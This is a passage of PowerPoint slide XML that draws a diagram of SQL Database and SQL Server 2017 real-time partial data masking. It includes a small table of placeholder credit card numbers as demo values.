                  <a:cubicBezTo>
                    <a:pt x="36" y="2"/>
                    <a:pt x="31" y="4"/>
                    <a:pt x="28" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="4"/>
                    <a:pt x="21" y="2"/>
                    <a:pt x="15" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="2" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="6"/>
                    <a:pt x="3" y="10"/>
                    <a:pt x="3" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="17"/>
                    <a:pt x="10" y="19"/>
                    <a:pt x="17" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="17"/>
                    <a:pt x="25" y="9"/>
                    <a:pt x="26" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="7"/>
                    <a:pt x="28" y="7"/>
                    <a:pt x="28" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="7"/>
                    <a:pt x="30" y="7"/>
                    <a:pt x="30" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="9"/>
                    <a:pt x="33" y="17"/>
                    <a:pt x="40" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="19"/>
                    <a:pt x="52" y="17"/>
                    <a:pt x="53" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="10"/>
                    <a:pt x="53" y="6"/>
                    <a:pt x="55" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="5"/>
                    <a:pt x="56" y="5"/>
                    <a:pt x="56" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="3"/>
                    <a:pt x="57" y="2"/>
                    <a:pt x="56" y="2"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="21" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="16"/>
                    <a:pt x="16" y="17"/>
                    <a:pt x="11" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="16"/>
                    <a:pt x="5" y="12"/>
                    <a:pt x="5" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="1"/>
                    <a:pt x="15" y="2"/>
                    <a:pt x="15" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="22" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="5"/>
                    <a:pt x="23" y="11"/>
                    <a:pt x="21" y="14"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="17"/>
                    <a:pt x="37" y="16"/>
                    <a:pt x="35" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="11"/>
                    <a:pt x="31" y="5"/>
                    <a:pt x="35" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="3"/>
                    <a:pt x="38" y="3"/>
                    <a:pt x="42" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="2"/>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="12"/>
                    <a:pt x="50" y="16"/>
                    <a:pt x="4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05" name="Oval 658"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6102988" y="4027976"/>
              <a:ext cx="5056" cy="6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06" name="Oval 659"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6260980" y="4027976"/>
              <a:ext cx="2528" cy="6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07" name="Freeform 682"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6478376" y="37979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08" name="Freeform 685"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6478376" y="3792885"/>
              <a:ext cx="0" cy="252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3237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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5674857" y="2191511"/>
            <a:ext cx="2727069" cy="1785190"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 168 w 1054"/>
              <a:gd name="T1" fmla="*/ 303 h 690"/>
              <a:gd name="T2" fmla="*/ 168 w 1054"/>
              <a:gd name="T3" fmla="*/ 289 h 690"/>
              <a:gd name="T4" fmla="*/ 459 w 1054"/>
              <a:gd name="T5" fmla="*/ 0 h 690"/>
              <a:gd name="T6" fmla="*/ 701 w 1054"/>
              <a:gd name="T7" fmla="*/ 129 h 690"/>
              <a:gd name="T8" fmla="*/ 781 w 1054"/>
              <a:gd name="T9" fmla="*/ 108 h 690"/>
              <a:gd name="T10" fmla="*/ 875 w 1054"/>
              <a:gd name="T11" fmla="*/ 136 h 690"/>
              <a:gd name="T12" fmla="*/ 950 w 1054"/>
              <a:gd name="T13" fmla="*/ 272 h 690"/>
              <a:gd name="T14" fmla="*/ 1054 w 1054"/>
              <a:gd name="T15" fmla="*/ 462 h 690"/>
              <a:gd name="T16" fmla="*/ 851 w 1054"/>
              <a:gd name="T17" fmla="*/ 690 h 690"/>
              <a:gd name="T18" fmla="*/ 826 w 1054"/>
              <a:gd name="T19" fmla="*/ 690 h 690"/>
              <a:gd name="T20" fmla="*/ 802 w 1054"/>
              <a:gd name="T21" fmla="*/ 690 h 690"/>
              <a:gd name="T22" fmla="*/ 327 w 1054"/>
              <a:gd name="T23" fmla="*/ 690 h 690"/>
              <a:gd name="T24" fmla="*/ 318 w 1054"/>
              <a:gd name="T25" fmla="*/ 690 h 690"/>
              <a:gd name="T26" fmla="*/ 306 w 1054"/>
              <a:gd name="T27" fmla="*/ 690 h 690"/>
              <a:gd name="T28" fmla="*/ 271 w 1054"/>
              <a:gd name="T29" fmla="*/ 690 h 690"/>
              <a:gd name="T30" fmla="*/ 196 w 1054"/>
              <a:gd name="T31" fmla="*/ 690 h 690"/>
              <a:gd name="T32" fmla="*/ 0 w 1054"/>
              <a:gd name="T33" fmla="*/ 495 h 690"/>
              <a:gd name="T34" fmla="*/ 168 w 1054"/>
              <a:gd name="T35" fmla="*/ 30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4" h="690">
                <a:moveTo>
                  <a:pt x="168" y="303"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="299"/>
                  <a:pt x="168" y="293"/>
                  <a:pt x="168" y="289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="129"/>
                  <a:pt x="298" y="0"/>
                  <a:pt x="459" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="560" y="0"/>
                  <a:pt x="649" y="52"/>
                  <a:pt x="701" y="129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="725" y="116"/>
                  <a:pt x="752" y="108"/>
                  <a:pt x="781" y="108"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="816" y="108"/>
                  <a:pt x="848" y="118"/>
                  <a:pt x="875" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="919" y="165"/>
                  <a:pt x="948" y="215"/>
                  <a:pt x="950" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1012" y="312"/>
                  <a:pt x="1054" y="383"/>
                  <a:pt x="1054" y="462"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1054" y="580"/>
                  <a:pt x="965" y="676"/>
                  <a:pt x="851" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="843" y="690"/>
                  <a:pt x="833" y="690"/>
                  <a:pt x="826" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="818" y="690"/>
                  <a:pt x="810" y="690"/>
                  <a:pt x="802" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="696" y="690"/>
                  <a:pt x="446" y="690"/>
                  <a:pt x="327" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324" y="690"/>
                  <a:pt x="321" y="690"/>
                  <a:pt x="318" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="306" y="690"/>
                  <a:pt x="306" y="690"/>
                  <a:pt x="306" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="300" y="690"/>
                  <a:pt x="283" y="690"/>
                  <a:pt x="271" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="690"/>
                  <a:pt x="196" y="690"/>
                  <a:pt x="196" y="690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="688"/>
                  <a:pt x="0" y="601"/>
                  <a:pt x="0" y="495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="397"/>
                  <a:pt x="73" y="316"/>
                  <a:pt x="168" y="303"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D3EEF9"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91403" tIns="45701" rIns="91403" bIns="45701" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="89620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sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="TextBox 839"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028627" y="3477918"/>
            <a:ext cx="1612939" cy="521222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932373"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72C6">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932373"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72C6">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL Server 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Isosceles Triangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="13462281">
            <a:off x="6777685" y="2117814"/>
            <a:ext cx="1628765" cy="1553692"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 80288"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="5000"/>
                  <a:lumOff val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="7000">
                <a:srgbClr val="0070C0"/>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7" tIns="146246" rIns="182807" bIns="146246" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="932103" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="23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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7464773" y="1785845"/>
          <a:ext cx="1815109" cy="1110030"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1815109">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="299985">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100"/>
                        <a:t>Table.CreditCardNo</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="119213" marR="119213" marT="0" marB="26848" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="270015">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100"/>
                        <a:t>1234-5678-9012-5796</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="bg2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="119213" marR="119213" marT="0" marB="26848" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="270015">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100"/>
                        <a:t>1234-5678-9012-1978</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="bg2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="119213" marR="119213" marT="0" marB="26848" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="270015">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100"/>
                        <a:t>1234-5678-9012-6550</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:schemeClr val="bg2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="119213" marR="119213" marT="0" marB="26848" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="844" name="Straight Connector 843"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6893443" y="3358299"/>
            <a:ext cx="2067516" cy="764095"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="00B0F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845" name="TextBox 844"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534716" y="3396692"/>
            <a:ext cx="2217575" cy="531598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932373"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C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Real-time data masking; partial masking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="245" name="Group 244"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6403653" y="2791330"/>
            <a:ext cx="537250" cy="636364"/>
            <a:chOff x="6179007" y="3309661"/>
            <a:chExt cx="478896" cy="567246"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="247" name="Oval 246"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6214064" y="3317798"/>
              <a:ext cx="412175" cy="16906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7" tIns="146246" rIns="182807" bIns="146246" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="932103" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2399"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8" name="Freeform 247"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6179007" y="3309661"/>
              <a:ext cx="478896" cy="567246"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 100 w 202"/>
                <a:gd name="T1" fmla="*/ 12 h 239"/>
                <a:gd name="T2" fmla="*/ 184 w 202"/>
                <a:gd name="T3" fmla="*/ 36 h 239"/>
                <a:gd name="T4" fmla="*/ 100 w 202"/>
                <a:gd name="T5" fmla="*/ 60 h 239"/>
                <a:gd name="T6" fmla="*/ 16 w 202"/>
                <a:gd name="T7" fmla="*/ 36 h 239"/>
                <a:gd name="T8" fmla="*/ 100 w 202"/>
                <a:gd name="T9" fmla="*/ 12 h 239"/>
                <a:gd name="T10" fmla="*/ 101 w 202"/>
                <a:gd name="T11" fmla="*/ 0 h 239"/>
                <a:gd name="T12" fmla="*/ 61 w 202"/>
                <a:gd name="T13" fmla="*/ 3 h 239"/>
                <a:gd name="T14" fmla="*/ 29 w 202"/>
                <a:gd name="T15" fmla="*/ 12 h 239"/>
                <a:gd name="T16" fmla="*/ 8 w 202"/>
                <a:gd name="T17" fmla="*/ 24 h 239"/>
                <a:gd name="T18" fmla="*/ 2 w 202"/>
                <a:gd name="T19" fmla="*/ 32 h 239"/>
                <a:gd name="T20" fmla="*/ 0 w 202"/>
                <a:gd name="T21" fmla="*/ 40 h 239"/>
                <a:gd name="T22" fmla="*/ 0 w 202"/>
                <a:gd name="T23" fmla="*/ 199 h 239"/>
                <a:gd name="T24" fmla="*/ 2 w 202"/>
                <a:gd name="T25" fmla="*/ 207 h 239"/>
                <a:gd name="T26" fmla="*/ 8 w 202"/>
                <a:gd name="T27" fmla="*/ 215 h 239"/>
                <a:gd name="T28" fmla="*/ 29 w 202"/>
                <a:gd name="T29" fmla="*/ 227 h 239"/>
                <a:gd name="T30" fmla="*/ 61 w 202"/>
                <a:gd name="T31" fmla="*/ 236 h 239"/>
                <a:gd name="T32" fmla="*/ 101 w 202"/>
                <a:gd name="T33" fmla="*/ 239 h 239"/>
                <a:gd name="T34" fmla="*/ 172 w 202"/>
                <a:gd name="T35" fmla="*/ 227 h 239"/>
                <a:gd name="T36" fmla="*/ 194 w 202"/>
                <a:gd name="T37" fmla="*/ 215 h 239"/>
                <a:gd name="T38" fmla="*/ 200 w 202"/>
                <a:gd name="T39" fmla="*/ 207 h 239"/>
                <a:gd name="T40" fmla="*/ 202 w 202"/>
                <a:gd name="T41" fmla="*/ 199 h 239"/>
                <a:gd name="T42" fmla="*/ 202 w 202"/>
                <a:gd name="T43" fmla="*/ 40 h 239"/>
                <a:gd name="T44" fmla="*/ 194 w 202"/>
                <a:gd name="T45" fmla="*/ 24 h 239"/>
                <a:gd name="T46" fmla="*/ 172 w 202"/>
                <a:gd name="T47" fmla="*/ 12 h 239"/>
                <a:gd name="T48" fmla="*/ 140 w 202"/>
                <a:gd name="T49" fmla="*/ 3 h 239"/>
                <a:gd name="T50" fmla="*/ 101 w 202"/>
                <a:gd name="T5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239">
                  <a:moveTo>
                    <a:pt x="100" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="12"/>
                    <a:pt x="184" y="23"/>
                    <a:pt x="184" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="49"/>
                    <a:pt x="146" y="60"/>
                    <a:pt x="100" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="60"/>
                    <a:pt x="16" y="49"/>
                    <a:pt x="16" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="23"/>
                    <a:pt x="54" y="12"/>
                    <a:pt x="100" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="101" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="3"/>
                    <a:pt x="61" y="3"/>
                    <a:pt x="61" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="12"/>
                    <a:pt x="29" y="12"/>
                    <a:pt x="29" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="24"/>
                    <a:pt x="8" y="24"/>
                    <a:pt x="8" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="32"/>
                    <a:pt x="2" y="32"/>
                    <a:pt x="2" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="199"/>
                    <a:pt x="0" y="199"/>
                    <a:pt x="0" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="207"/>
                    <a:pt x="2" y="207"/>
                    <a:pt x="2" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="215"/>
                    <a:pt x="8" y="215"/>
                    <a:pt x="8" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="227"/>
                    <a:pt x="29" y="227"/>
                    <a:pt x="29" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="236"/>
                    <a:pt x="61" y="236"/>
                    <a:pt x="61" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="238"/>
                    <a:pt x="87" y="239"/>
                    <a:pt x="101" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="239"/>
                    <a:pt x="154" y="234"/>
                    <a:pt x="172" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="224"/>
                    <a:pt x="189" y="219"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="212"/>
                    <a:pt x="198" y="210"/>
                    <a:pt x="200" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="205"/>
                    <a:pt x="202" y="202"/>
                    <a:pt x="202" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="40"/>
                    <a:pt x="202" y="40"/>
                    <a:pt x="202" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="34"/>
                    <a:pt x="199" y="29"/>
                    <a:pt x="194" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="20"/>
                    <a:pt x="181" y="15"/>
                    <a:pt x="172" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="8"/>
                    <a:pt x="152" y="5"/>
                    <a:pt x="140" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="1"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="101"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896203" rtl="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srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Rectangle 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
